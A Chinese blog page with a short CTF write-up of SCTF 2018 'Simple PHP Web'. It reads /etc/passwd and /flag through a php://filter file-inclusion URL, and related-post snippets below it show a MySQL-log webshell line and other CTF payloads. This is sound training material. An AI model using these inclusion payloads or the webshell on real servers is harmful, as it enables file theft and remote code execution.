SCTF 2018_Simple PHP Web

最新推荐文章于 2022-08-12 19:01:41 发布
最新推荐文章于 2022-08-12 19:01:41 发布
阅读量498 收藏
点赞数
分类专栏: ctf刷题纪 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52268949/article/details/122864829
版权
SCTF 2018_Simple PHP Web

进入环境注意观察url

http://www.bmzclub.cn:23627/?f=login.php

有点像是文件读取我们尝试读一下/etc/passwd,直接读发现不行我们尝试使用伪协议

http://www.bmzclub.cn:23627/?f=php://filter/convert.base64-encode/resource=/etc/passwd

发现成功能读出

在这里插入图片描述

接下来我们尝试读取/flag

http://www.bmzclub.cn:23627/?f=php://filter/convert.base64-encode/resource=/flag

在这里插入图片描述

听门外雪花飞
关注
专栏目录
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup
05-11
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。 根据提供的url进入登录地址,发现用户名密码已经无法登陆 第二步:下载源码 查看网页...
SCTF2018 Writeup
dieqiang4646的博客
06-26 1077
_____ _____ _______ ______ / ____|/ ____|__ __| ____| | (___ | | | | | |__ \___ \| | | | | __| ____) | |____ | | | | |_____/ \_____| |_...
BMZCTF-WEB-SCTF 2018_Simple PHP Web
qq_24033605的博客
05-24 224
SCTF 2018_Simple PHP Web 看到url很容易想到文件读取漏洞。 尝试利用php伪协议读取/flag文件。 base64解码得到flag。
SCTF2018 BabySyc - Simple PHP Web Writeup
dengzhasong7076的博客
06-20 834
题目描述: 简单的php题目,来挑战一下吧 ~ http://116.62.71.206:52872/?f=login.php 前言 毕业前留下一点微小的贡献吧,此题主要是围绕php加密插件来出题的,其它的算是点缀,不过好像很多人在第二步上传卡死了。本来想第二早放提示,结果wupco师傅早上5点用了一个非预期解出了,Orz。 获取插件 漏洞点很明显,有一个文件包含,可以直接读取到/etc...
BMZCTF SCTF 2018_Simple PHP
qq_26243045的博客
11-29 340
考点:php伪协议 打开网页后,是一个登录框 目录扫描也没有什么结果,使用sqlmap也没结果,爆破admin的密码也没结果,最后试了试php伪协议,可以使用filter的base64读取/flag文件: Base64解密后就得到flag ...
[BMZCTF]-SCTF 2018_Simple PHP
cjdgg的博客
05-28 214
[BMZCTF]-SCTF 2018_Simple PHP 这题题目界面很简洁,又是就几个输入框,不管输入啥都是报错登录错误,考点不是注入,又注意到url,可以试试一些协议读取信息 这里成功读到login.php源代码 但是解码后发现是一对乱码,就很离谱,那就试试能不能直接读flag文件 好在flag文件可以直接读出来 ...
SCTF2020:SCTF2020
04-01
7. **Web安全**:结合Java Web开发,了解SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造等常见攻击手段,以及相应的防御策略。 8. **密码学**:理解Java提供的加密库如Java Cryptography Architecture (JCA),熟悉...
sctf2018-NginxSecret:sctf2018-Nginx秘密
05-10
readme开启或者关闭docker环境docker-compose builddocker-compose up -ddocker-compose down手动开启botbot.py需要手动开启,登陆admin B3P#9!3J%#1dFp%&。拿到cookie加在py中对应的地方即可。
SCTF差分晶振15013896510
06-21
SCTF差分晶振15013896510 SCTF差分晶振15013896510是一款差分晶振器件,提供了高频率稳定性和低抖动特性,适用于高速应用场景。 电气参数: * 频率:106.25、125、155.52、161.1328、187.5、312.5MHz * 频率稳定...
sctf2014 misc400b.rar
09-30
sctf2014 misc400b.rar
[SWPUCTF 2018]SimplePHP
qq_35231971的博客
08-12 272
[SWPUCTF 2018]SimplePHP
SCTF2018-Event easiest web - phpmyadmin
weixin_30753873的博客
06-21 128
6月19日的SCTFweb送分题。 打开链接是一个phpmyadmin的登陆界面,尝试用默认账号:root 密码:root登陆 于是直接进去了,首先看下数据库,除了些初始化的库以外,abc这个库比较在意。 查看一下里面的内容。 这个库估计是各个师傅们在做这个题的时候为了getshell创建的。 很明显是有个字段名是php一句话木马,之前没怎么接触数据库的getshell,于是...
[SCTF 2018]ZhuanXV
Sk1y的博客
12-19 874
赛题:[SCTF 2018]ZhuanXV 文章目录赛题:[SCTF 2018]ZhuanXV读取文件sql注入漏洞 读取文件 使用dirsearch工具进行扫描 发现/list,访问是个登录界面,查看源码 发现背景图片的路径 查看web.xml http://111.200.241.244:63455/loadimage?fileName=../../WEB-INF/web.xml 发现使用了strut2框架, struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主
2018 SCTF 部分wp
Risker
06-21 2118
弱弱的web狗表示简直就没有活路....Webeasiest  web-phpmyadmin参考这篇:地址执行以下sql语句:set global general_log='on'; SET global general_log_file='D:/phpStudy/WWW/cmssssacsd.php'; SELECT '<?php assert($_POST["cmd"]);?>'用...
ISCC 2018 PWN WriteUp
lacoucou的专栏
05-27 2351
ISCC一上线,所有上网的人便都看着他笑,有的叫道,“ISCC,你又处新题了!”他不回答,对柜里说,“加两道web题,再来一个Reverse。”便排出九文大钱。他们又故意的高声嚷道,“你出的题又被秒了!”ISCC 睁大眼睛说,“你怎么这样凭空污人清白……”“什么清白?我前天亲眼见你PWN题目一上线,就被网友吊着打。”ISCC便涨红了脸,额上的青筋条条绽出,争辩道,“PWN题怎么秒杀……PWN!……程序猿的事,能算秒杀么?”接连便是难懂的话,什么“Double Free”,什么“Use after Free”
BUUCTF-WEB 【0CTF 2016】piapiapia 1
qq_36410265的博客
12-27 1940
BUUCTF-WEB 【0CTF 2016】piapiapia 1
BMZCTF Traffic_Light
qq_26243045的博客
11-29 983
下载附件,打开后是一张gif动图。内容是一个红绿灯 对图片进行分解 得到1688张图片 观察图片: 1、发现第2的倍数的图片都是没有灯亮的。忽略不计。 2、绿灯和红灯总和为8或8的倍数时,下一张一定是黄色。 由此可以推断为二进制。绿为1,红为0,黄为空格。 写脚本进行编码: # -*-coding: utf-8 -*- from PIL import Image binstr = "" flag = "" def decode(s): return ''.join([chr(i) for
BMZCTF:zonghe
末初的CSDN博客
04-25 259
http://www.bmzclub.cn/challenges#zonghe 看到这个,直接尝试可不可以伪协议读取本地文件 /file.php?file=php://filter/convert.base64-encode/resource=/etc/passwd /file.php?file=php://filter/convert.base64-encode/resource=/flag >>> from base64 import * >>> b64
BMZCTF-MISC-HEBTUCTF 你可能需要一个wireshark
qq_24033605的博客
04-10 191
HEBTUCTF 你可能需要一个wireshark 这是道流量分析题。(我知道这是句废话) 刚打开一脸懵,一点提示也没有。 看了末初师傅的一点提示: 添加链接描述 直接在tcp中搜索包含flag的文件,结果还真有,离谱。 对text文件追踪流,在数据包头看见一个base64的编码。 flag十有八九跟他有关了。 base64编码又含URL编码的两个字符,猜测是两个大括号,提交正确。 ...
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值